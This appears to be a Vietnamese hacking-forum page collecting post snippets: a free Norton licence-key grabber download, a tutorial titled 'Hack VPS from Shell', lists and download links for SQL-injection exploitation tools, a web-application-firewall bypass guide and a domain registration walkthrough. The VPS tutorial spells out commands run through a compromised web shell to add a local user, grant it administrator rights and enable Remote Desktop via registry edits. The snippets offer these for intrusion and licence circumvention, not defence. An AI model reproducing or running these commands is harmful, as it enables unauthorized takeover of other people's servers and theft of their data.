Share Thủ Thuật Lấy Key Nis

I. Giới thiệu.
-X-Men Company đả vắn bóng một thời gian dài sao khi tung ra bản vá lổi Unicode Connection Controls - 1.0.26.
-X-Men Company chính thức giản tán vì những khó khăn. Có lẻ đây là một tin buồn.
-XHIntell là tên cho một khởi đầu mới. Sản phẩm đầu tiên của XHI là XHI Key

II. Sản phẩm
-Mục đích dùng để lấy Key NIS free từ server. Chỉ mất vài giây.

III. Cách dùng
1. Chạy.

2. Nhấn vào Here. Skip ad....
3. Lấy Key và dùng.

http://www.mediafire.com/?ee4je662d7e4w9b
Đã test thành công và được key 118 days nhé , mỗi ip get được 1 key thui nên các bạn đừng có ham hố nhé
Thanks
Nguồn VHU

Xem Thêm

[TUT] Up Shell bằng tamper data

bạn cần cài tamper data tại đây
https://addons.mozilla.org/en-US/firefox/addon/tamper-data/

Xem Thêm

Bug Topx Vbb

Xem Thêm

Methods to Bypass a Web Application Firewall

View Online: http://www.mediafire.com/view/?zt0co73xw00l3q3

Download: http://www.mediafire.com?zt0co73xw00l3q3

Xem Thêm

[TUT] Hack VPS từ Shell !

đầu tiên execute command trên con shell đó >

net user l33t p4$sword /add 

l33t=username p4$sword=password

Bây giờ để truy cập quản trị cho người sử dụng của bạn> excute command

Code:

net localgroup administrators l33t /add

 Sau đó thực hiện kết nối tới VPS

Nếu VPS một ip tĩnh nhưng không kết nối vào (mstsc) sử dụng các lệnh để cho phép người dùng từ xa:

Code:

reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f

Code:

reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f

Xem Thêm

Pangolin Professinal Edition 3.2.4.1132

Pangolin Professinal Edition 3.2.4.1132

Pangolin is a penetration testing, SQL Injection test tool on database security. It finds SQL Injection vulnerabilities.Its goal is to detect and take advantage of SQL Injection vulnerabilities on web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user"s specific DBMS tables/columns, run his own SQL statement, read specific files on the file system and more.

Database support:

Access,DB2,Informix,Microsoft SQL Server 2000,Microsoft SQL Server 2005,Microsoft SQL Server 2008,MySQL,Oracle,PostgreSQL,Sqlite3,Sybase.

Download:

http://www.box.com/s/xhd4obdnii9v5eqnn0l1

Xem Thêm

JSky 3.5.1

New Feature and improvement
1. Add tens of new vulnerabilities definition.
2. Enhanced SQL Injection ability.
3. Add ability to process a special HTTP 404 redirection page.
4. Add a new parameter to control scanning process when HTTP connection failed.
5. Add new function report template editor.
6. Enhanced HTML report.
7. Support vulnerabilities sorting by URL type.

Bug fixed:
1. Fixed bug failed to display HTML info after scan a default page.
2. Fixed bug when export report to Chinese directory.
3. Fixed issue Max scan links.
4. Fixed some other Bugs. 

Download: http://www.box.com/s/t54go352u6o3qu2sln2s

Xem Thêm

Hướng tẫn tạo 1 con bot đơn giản

Download: http://www.mediafire.com/?dtdxmydmrht
Password: sinhvienit.net

Xem Thêm

Bypass SQLi VBB ( ALL Version )

Xem Thêm

Top15 phần mềm scan bug sql

Share cho newbie -pro chém nhẹ nha!


SQLIer - SQLIer takes a vulnerable url and attempts to determine all the necessary information to exploit the SQL Injection vulnerability by itself, requiring no user interaction at all. Get SQLIer.

Code:
http://bcable.net/project.php?sqlier


SQLbftools - SQLbftools is a collection of tools to retrieve MySQL information available using a blind SQL Injection attack. Get SQLbftools.

Code:
http://www.reversing.org/node/view/11


SQL Injection Brute-forcer - SQLibf is a tool for automatizing the work of detecting and exploiting SQL Injection vulnerabilities. SQLibf can work in Visible and Blind SQL Injection. It works by doing simple logic SQL operations to determine the exposure level of the vulnerable application. Get SQLLibf.

Code:
http://www.open-labs.org/sqlibf19beta1.tar.gz


SQLBrute - SQLBrute is a tool for brute forcing data out of databases using blind SQL injection vulnerabilities. It supports time based and error based exploit types on Microsoft SQL Server, and error based exploit on Oracle. It is written in Python, uses multi-threading, and doesn’t require non-standard libraries. Get SQLBrute.

Code:
http://www.justinclarke.com/security/sqlbrute.py


download ActivePerl dành cho win:

http://aspn.activestate.com/ASPN/Downloads/ActivePerl/

BobCat - BobCat is a tool to aid an auditor in taking full advantage of SQL injection vulnerabilities. It is based on AppSecInc research. It can list the linked severs, database schema, and allow the retrieval of data from any table that the current application user has access to. Get BobCat.

Code:
http://www.northern-monkee.co.uk/pub/bobcat.html


SQLMap - SQLMap is an automatic blind SQL injection tool, developed in python, capable to perform an active database management system fingerprint, enumerate entire remote databases and much more. The aim of SQLMap is to implement a fully functional database management system tool which takes advantages of web application programming security flaws which lead to SQL injection vulnerabilities. Get SQLMap.

Code:
http://sqlmap.sourceforge.net/


Absinthe - Absinthe is a GUI-based tool that automates the process of downloading the schema and contents of a database that is vulnerable to Blind SQL Injection. Get Absinthe.

Code:
http://www.0x90.org/releases/absinthe/download.php


SQL Injection Pen-testing Tool - The SQL Injection Tool is a GUI-based utility designed to examine database through vulnerabilities in web-applications. Get SQL Injection Pen-testing tool.

Code:
http://sqltool.itdefence.ru/indexeng.html


SQID - SQL Injection digger (SQLID) is a command line program that looks for SQL injections and common errors in websites. It can perform the follwing operations: look for SQL injection in a web pages and test submit forms for possible SQL injection vulnerabilities. Get SQID.

Code:
http://sqid.rubyforge.org/


Blind SQL Injection Perl Tool - bsqlbf is a Perl script that lets auditors retrieve information from web sites that are vulnerable to SQL Injection. Get Blind SQL Injection Perl Tool.

Code:
http://www.unsec.net/download/bsqlbf.pl

---------Nguồn GUG-------------

Xem Thêm

TUT reg tên miền tiếng việt

Tut reg tên miền tiếng việt miễn phí

Bước 1 vào http://vnnic.vn/tenmientiengviet/ tra cứu xem tên miền có sẵng chưa nhé

Ví dụ tên miền của mình reg là “sinhtửhội.vn” sau đó bấm nút tra cứu, nếu báo chưa ai đăng ký là mình có thể reg đc.

Bước 2: Vào http://dangky.tenmientiengviet.vn/jsp/login.jsp hoặc bấm nút Đăn ký TMTV sẽ hiện ra như sau:

Bấm vào nút tạo tài khoản mới nhá:
Sau đó điền info đầy đủ của mình vào:
Postcode thì vào http://postcode.vnpost.vn/services/search.aspx lấy nhá
Ví dụ info của mình là:
Còn Ngày cấp CMND: thì điền ngày 01/01/ năm mình làm CMND ví dụ 01/01/2010
Nơi cấp thì ghi thị trấn mình làm cho nhanh ví dụ Phú Long
Nhập info đoạn đầu rồi bấm Lấy từ thông tin chủ thể cho nó lẹ nhá

Nếu nhập info chính xác thì sẽ hiện thông báo như sau:

Bấm OK lun

Rồi bấm vào đăng ký tên miền để đăng ký nhá:

Nếu báo lỗi: Số lượng ký tự của tên miền đã nhập nhiều hơn số lượng ký tự tối đa của một từ đơn trong tiếng Việt thì reg tên miền # NHÁ.


Bấm tiếp tục đăng ký lun

Bấm nút tiếp tục luôn
Rồi bấm Tôi đồng ý chờ 48 giờ

Là thành công
Vài ngày sau bạn vào
Đăng nhập thử nếu trạng thái: Đã được xác nhận QSD là xong nhé.
Sau khí có QSD bạn sẽ được vào http://dichvu.tenmientiengviet.vn/ để trỏ DNS hoặc tạo web có sẵng
với tên truy cập và mật khẩu của bạn đã tạo trước đó.
Ví dụ:
Mỗi lần trỏ DNS khổ lắm, toàn chờ tụi nó làm cho mình,chả auto tý nào cả.

Xem Thêm